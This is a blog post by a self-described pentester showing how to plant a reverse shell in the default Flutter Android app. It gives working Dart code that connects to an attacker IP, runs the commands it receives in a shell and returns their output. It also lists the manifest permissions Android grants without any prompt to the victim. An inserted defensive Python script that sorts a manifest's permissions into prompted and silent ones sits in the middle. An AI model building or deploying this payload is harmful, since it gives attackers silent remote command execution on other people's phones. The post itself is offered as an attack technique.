Reverse Shell in Android From App in Flutter

Diego Condori
3 min readDec 16, 2023

Those of us who have ever set up a reverse shell by installing a malicious application on an Android phone with metasploit, whether to experiment or to troll, may have tried it again recently and found that it no longer works: I tried on a Samsung S10 running Android 12 and it did not. On top of that, the payload generated by metasploit explicitly asks the victim for permissions at execution time. That is why I decided to try the same thing with Flutter. In this experiment I will use a Samsung S10 with Android 12 and the default application that Flutter generates, and I will focus only on injecting the payload into the main function.

This code goes into the main function:

// Requires `import 'dart:io';` at the top of the file (Socket, Process)
final String serverIp = '192.168.86.26'; // attacker IP
final int serverPort = 443; // attacker port

Socket.connect(serverIp, serverPort).then((socket) {
  print('Connection successful');

  // Listen for data from the server
  socket.listen(
    (data) {
      final command = String.fromCharCodes(data).trim();
      print('Command received from server: $command');

      // Reverse shell: run the command in a shell and send back its stdout
      Process.run(command, [], runInShell: true).then((result) {
        final output = result.stdout;
        socket.write(output);
      }).catchError((error) {
        socket.write('Error command: $error');
      });
    },
    onDone: () {
      print('Connection with server closed.');
      socket.destroy();
    },
    onError: (error) {
      print('Error: $error');
      socket.destroy();
    },
  );
}).catchError((error) {
  print('Error connecting to server: $error');
});

At this point we can compile the APK and install it on the phone, but it will not work. On a virtual device it does work (I tried it), but for it to work on this phone we need to add the following permissions to AndroidManifest.xml:

<manifest xmlns:android="http://schemas.android.com/apk/res/android">

    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />

    <application.........
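The reason no dialog appears is that every permission listed above has the "normal" protection level: Android grants it at install time without a runtime prompt, so a user reviewing an app never sees a request for network access. As an added, defender-oriented example (this is not code from the original post), the following Python script parses the `<uses-permission>` entries of a manifest and reports which ones would produce a runtime prompt on Android 6+ and which are granted silently. The protection-level table is a partial, hand-maintained subset and is an assumption; the sample manifest is constructed to mirror the permissions listed above.

```python
"""Triage the <uses-permission> entries of an AndroidManifest.xml.

Reports which declared permissions trigger a runtime prompt (protection
level "dangerous") and which are granted silently at install time
("normal"), then flags combinations worth a closer look during review.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"

# Partial table (assumption): permission -> protection level.
# Extend it from the Android documentation for your own triage.
PROTECTION_LEVEL = {
    "android.permission.INTERNET": "normal",
    "android.permission.ACCESS_NETWORK_STATE": "normal",
    "android.permission.ACCESS_WIFI_STATE": "normal",
    "android.permission.WAKE_LOCK": "normal",
    "android.permission.RECEIVE_BOOT_COMPLETED": "normal",
    "android.permission.CAMERA": "dangerous",
    "android.permission.RECORD_AUDIO": "dangerous",
    "android.permission.READ_CONTACTS": "dangerous",
    "android.permission.ACCESS_FINE_LOCATION": "dangerous",
    "android.permission.READ_SMS": "dangerous",
}

# Constructed sample manifest mirroring the permissions discussed in the post.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <application android:label="sample" />
</manifest>
"""


def declared_permissions(manifest_xml: str) -> list[str]:
    """Return the android:name of every <uses-permission> element, in order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR)]


def review_permissions(manifest_xml: str) -> dict:
    """Classify declared permissions and return review findings."""
    levels = {p: PROTECTION_LEVEL.get(p, "unknown") for p in declared_permissions(manifest_xml)}
    runtime_prompt = sorted(p for p, lvl in levels.items() if lvl == "dangerous")
    silent = sorted(p for p, lvl in levels.items() if lvl == "normal")
    unknown = sorted(p for p, lvl in levels.items() if lvl == "unknown")

    findings = []
    if "android.permission.INTERNET" in silent and not runtime_prompt:
        findings.append(
            "network access with no runtime-prompted permission: "
            "the user never sees a permission dialog for this app"
        )
    if "android.permission.RECEIVE_BOOT_COMPLETED" in silent:
        findings.append(
            "RECEIVE_BOOT_COMPLETED declared: app can register to start "
            "after reboot without user interaction; check its receivers"
        )
    return {
        "runtime_prompt": runtime_prompt,
        "silent": silent,
        "unknown": unknown,
        "findings": findings,
    }


if __name__ == "__main__":
    report = review_permissions(SAMPLE_MANIFEST)
    for key, value in report.items():
        print(f"{key}:")
        for item in value:
            print(f"  - {item}")
```

Run it against a real manifest by passing the file contents to `review_permissions`; any permission absent from the table lands in `unknown` rather than being silently classified, so an incomplete table degrades to "needs a human look" instead of to a false negative.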

Now we run the application:

It does not ask us for any permissions. Let's check our attacker terminal:

We gotcha...

Now let’s run some commands:

With this I conclude this story. It was interesting to return to the days of experimenting with the famous metasploit, although I must emphasize that, compared with those times, even though we have achieved a reverse shell, it is harder to find certain information because we are limited. Unless we can escalate privileges, possibly through a CVE, and thereby gain total control if necessary; but that is not the case here. I have already tried using Termux to extract some information, and it is usually limited.


Diego Condori

eJPT | eCPPT | Pentester Red Team | Computer Science Student | Programmer